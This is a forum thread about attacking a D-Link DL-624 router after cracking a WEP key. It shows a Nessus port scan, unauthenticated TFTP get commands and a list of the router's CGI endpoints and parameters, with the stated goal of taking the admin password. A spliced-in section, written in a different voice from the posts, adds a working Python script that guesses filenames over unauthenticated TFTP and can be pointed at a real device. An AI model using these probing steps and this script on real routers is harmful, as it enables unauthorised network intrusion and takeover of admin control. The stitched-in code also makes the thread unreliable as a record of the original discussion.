
Thread: Ap hack test DL-624 x-trem G

  1. #1
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Ap hack test DL-624 x-trem G

    So you crack a WEP key like millions of other users... it's fun, I guess, but now what?

    Here's what: let's push this a little further, shall we? So I use Nessus to scan our newly found home (192.168.0.1).

    Well, imagine that:

    rrac 5678/tcp open
    http 80/tcp open
    tftp 69/udp open <--- w00t
    general /icmp
    general udp
    Domain 53/udp
    domain 53/tcp
    general /tcp


    Now, that doesn't seem like much, but for a tiny little AP box it is. Now the question is, what are we going to do with this?

    So most of this is pretty useless, or I haven't found out what to use it for or how to take advantage of it, but the TFTP is nice, so let's try:

    bt ~ # tftp 192.168.0.1
    tftp> mode
    Using netascii mode to transfer file.
    tftp> verbose
    Verbose mode on.
    tftp> get admin.img 192.168.0.100    (that's me)
    getting from 192.168.0.1:admin.img to 192.168.0.100 [netascii]
    Error code 1: file not found
    tftp>



    OK, so I didn't get lucky; I got an error on the file requested. But if you haven't noticed by now, we were able to request a file via TFTP without even putting in a login/password.
    Now, this also works for uploading your own file or whatever to the AP without logging in.

    Anyway, I'm still working on trying to get a file list from my AP to see what I can d/l. I haven't had any luck yet, so if any of you have any output on this, feel free to reply.

    Here are a few more things you can try:
    192.168.0.1/natlist.txt
    192.168.0.1/public.js
    192.168.0.1/chklst.txt
    download dbgout.txt with tftp

    That's it for now; if you know more, let me know.

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385


    Don't you have to put the full path of the file in your command? Instead of...

    tftp> get admin.img 192.168.0.100

    and make it...

    tftp> get C:\Documents and Settings\Xploitz\My Documents\admin.img 192.168.0.100

    No???

    Sorry... but I'm without my BT2 right now, so I'm kinda shooting in the dark here. I could be completely wrong. I'm waiting on an HD caddy for my laptop from eBay.

    --=Xploitz=-- ®
    Remote-Exploit.org's Master Tutorialist.™
    VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=9063
    VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial" - http://forums.remote-exploit.org/showthread.php?t=7872
    VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial" - http://forums.remote-exploit.org/showthread.php?t=8230
    VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases" - http://forums.remote-exploit.org/showthread.php?t=8041

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Without specifying the location, it seems to put everything in my /root folder. Plus, we're not attacking a client box; we're going after the AP itself, so there's no such thing as C:\etc etc.

    Any way to get a full list of available files from the AP itself?

  4. #4
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Hmm... perhaps this will get you started...

    connect host-name [ port ]    (port is optional...)
    mode transfer-mode

    Since IPv6 addresses already contain ":"s, the host should be enclosed in square brackets when an IPv6 address is used. Otherwise, the first occurrence of a colon will be interpreted as the separator between the host and the filename. For example,

    [1080::8:800:200c:417A]:myfile

    Files may be written only if they already exist and are publicly writable.

    get filename
    get remotename localname
    get filename1 filename2 filename3 ... filenameN

    Get a file or set of files (three or more) from the specified remote sources. source can be in one of two forms: a filename on the remote host if the host has already been specified, or a string of the form:

    host:filename

    to specify both a host and filename at the same time. If the latter form is used, the last host specified becomes the default for future transfers. See the put command regarding specifying a host.

    I don't know if this helps you or not... but it's all I could find on Google for ya.

    More is here...

    Code:
    http://www.scit.wlv.ac.uk/cgi-bin/mansec?1+tftp

  5. #5
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Thanks. Yeah, Google's been sort of useless in this case... damn you, Google. I may just have to back up my access point firmware and try to take it apart, to have a full file list of what could be done to it.

    The ultimate goal, once you have access to the network, is to rip the AP admin password. Once you control the AP, you own the place.

    I got some response with some CGI [default value] from the browser.

    Slowly making progress.

    Here's what I got so far, if anyone is interested.
    Most of them get a 403, but it's a work in progress.

    /tools_ddns.cgi (ddnsEnable [1] ddnsEnable [0] ddns_server [] ddns_host [] ddns_user [] ddns_pass [] )
    /h_dhcp.cgi (edit_row [-1] del_row [-1] dhcpsvr [1] dhcpsvr [0] start_ip4 [100] end_ip4 [199] lease [] revdhcp [1] revdhcp [0] name [] static_ip4 [] mac1 [] mac2 [] mac3 [] mac4 [] mac5 [] mac6 [] dhcp [] clone [Clone] )
    /st_device.cgi (release [DHCP Release] renew [DHCP Renew] )
    /tools_misc.cgi (hEnable [0] hEnable [1] upnp [1] upnp [0] game [1] game [0] pptp_pt [1] pptp_pt [0] ipsec_pt [1] ipsec_pt [0] multicast_pt [1] multicast_pt [0] wanspd [1] wanspd [0] wanspd [2] )
    /load.cgi (file [] load [Load] )
    /tools_time.cgi (time_type [0] ntp [] interval [] time_type [1] year [] mon [] day [] set [Computer Clock] hour [] min [] sec [] tzone [] daylight [1] daylight [0] s_month [] s_week [] e_month [] e_week [] )
    /ping.cgi (ip [] ping [Ping] )
    /h_wan_dhcp.cgi (connType [0] connType [1] connType [2] otherType [] connType [3] connType [5] connType [4] host [go **** urself] mac1 [00] mac2 [13] mac3 [46] mac4 [a3] mac5 [27] mac6 [17] clone [Clone MAC Address] dns1 [0.0.0.0] dns2 [0.0.0.0] mtu [1500] )
    /restore.cgi (restore [Restore] )
    /restart.cgi (restart [Reboot] )

    And the other problem is that the TFTP connection doesn't have a DIR or listing of available files (this should be solved soon).

    Then again, just for the record, these may not work on all manufacturers; these tests were performed on a DL-624 Xtreme G router. I may just plug in my DL-514 and the Netgear one afterwards to see if I can find anything. Anyway, I'll keep working on it.

    Be patient, the universe didn't get created overnight (although there is a theory about a big bang).
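The file-discovery problem raised in post #1 (files can be fetched over TFTP with no login) and again in post #5 (TFTP has no directory listing) can be attacked the only way the protocol allows: send a read request for each candidate name and classify the first reply. The script below is an added example and is not code from the original posts, from D-Link, or from the device's firmware. Per RFC 1350, a DATA packet back means the file exists and is readable without any credentials; an ERROR packet with code 1 is the "file not found" the poster saw for admin.img. So the probe can run offline, it includes a constructed single-packet TFTP responder bound to localhost; the host/port, the fake file contents and the generic candidate names beyond those the thread lists are assumptions, not facts about the DL-624.

```python
import socket
import struct
import threading

# TFTP opcodes from RFC 1350
RRQ, DATA, ACK, ERROR = 1, 3, 4, 5

# Constructed sample data for the offline stand-in server (not real AP content).
FAKE_FILES = {"dbgout.txt": b"constructed debug output placeholder\n"}

# Names the thread mentions plus one generic guess ("config.bin" is an
# assumption, not a name the device is known to serve).
CANDIDATES = ["admin.img", "dbgout.txt", "natlist.txt", "chklst.txt", "config.bin"]


def build_rrq(filename, mode="octet"):
    """Encode a TFTP Read Request: opcode 1, filename, NUL, mode, NUL."""
    return struct.pack("!H", RRQ) + filename.encode() + b"\x00" + mode.encode() + b"\x00"


def parse_reply(pkt):
    """Classify the first packet a server returns for an RRQ.

    DATA  -> ("data", block_number, payload)   file exists and is readable
    ERROR -> ("error", error_code, message)    code 1 is "File not found"
    """
    if len(pkt) < 4:
        return ("malformed", None, pkt)
    opcode, field = struct.unpack("!HH", pkt[:4])
    if opcode == DATA:
        return ("data", field, pkt[4:])
    if opcode == ERROR:
        msg = pkt[4:].split(b"\x00", 1)[0].decode("ascii", errors="replace")
        return ("error", field, msg)
    return ("other", opcode, pkt[2:])


def probe(host, port, names, timeout=1.0):
    """Send one RRQ per candidate name and record how the server answers.

    TFTP has no directory listing, so guessing names is the only way to
    discover what an unauthenticated TFTP daemon is willing to hand out.
    The reply may come from a new source port (the server's TID), which an
    unconnected UDP socket accepts without special handling.
    """
    results = {}
    for name in names:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            sock.sendto(build_rrq(name), (host, port))
            pkt, _ = sock.recvfrom(65535)
            results[name] = parse_reply(pkt)
        except socket.timeout:
            results[name] = ("timeout", None, None)
        finally:
            sock.close()
    return results


def start_fake_tftp(files):
    """Constructed single-packet TFTP responder on 127.0.0.1 for offline runs.

    Serves the first data block of any name in `files` and answers every
    other RRQ with error code 1, as the AP in the thread did for admin.img.
    Returns the ephemeral port it is listening on.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))

    def serve():
        while True:
            pkt, addr = srv.recvfrom(65535)
            if len(pkt) < 2 or struct.unpack("!H", pkt[:2])[0] != RRQ:
                continue
            name = pkt[2:].split(b"\x00", 1)[0].decode("ascii", errors="replace")
            if name in files:
                srv.sendto(struct.pack("!HH", DATA, 1) + files[name][:512], addr)
            else:
                srv.sendto(struct.pack("!HH", ERROR, 1) + b"File not found\x00", addr)

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Offline demo against the stand-in; point host/port at the AP
    # (192.168.0.1 port 69 in the thread) to probe a real device.
    port = start_fake_tftp(FAKE_FILES)
    for name, (kind, code, detail) in probe("127.0.0.1", port, CANDIDATES).items():
        if kind == "data":
            print(f"{name:12} readable, {len(detail)} bytes in block {code}")
        else:
            print(f"{name:12} {kind} {code if code is not None else ''} {detail or ''}")
```

The probe deliberately never ACKs a DATA block, so a real server will retransmit and then give up on its own; it only answers the question "will this daemon serve this name to anyone?", which is the finding that matters here. Run it only against equipment you own or are authorised to test.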

  6. #6
    Junior Member
    Join Date
    Dec 2007
    Posts
    30

    Did you ever get any farther on this?

  7. #7
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    This is interesting, but since it's a 192.168.x.x address, an attacker would have to be on your network to execute any attack. Assuming you've properly secured your AP, it should be exceedingly difficult for someone else to become part of your network, especially since this device offers LEAP & RADIUS.

    You could download and unpack the firmware from D-Link to see what files are there, though that might be considered reverse engineering and could result in your violating the DMCA or some license with D-Link. (IIRC D-Link likes to use ARJ compression for its firmware.)

    It might be interesting to know if you can get NATLIST.TXT or CHKLST.TXT via tftp.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  8. #8
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    8

    Still working on it; within the next week or so I should have the full disclosure ready to post. Stay tuned.
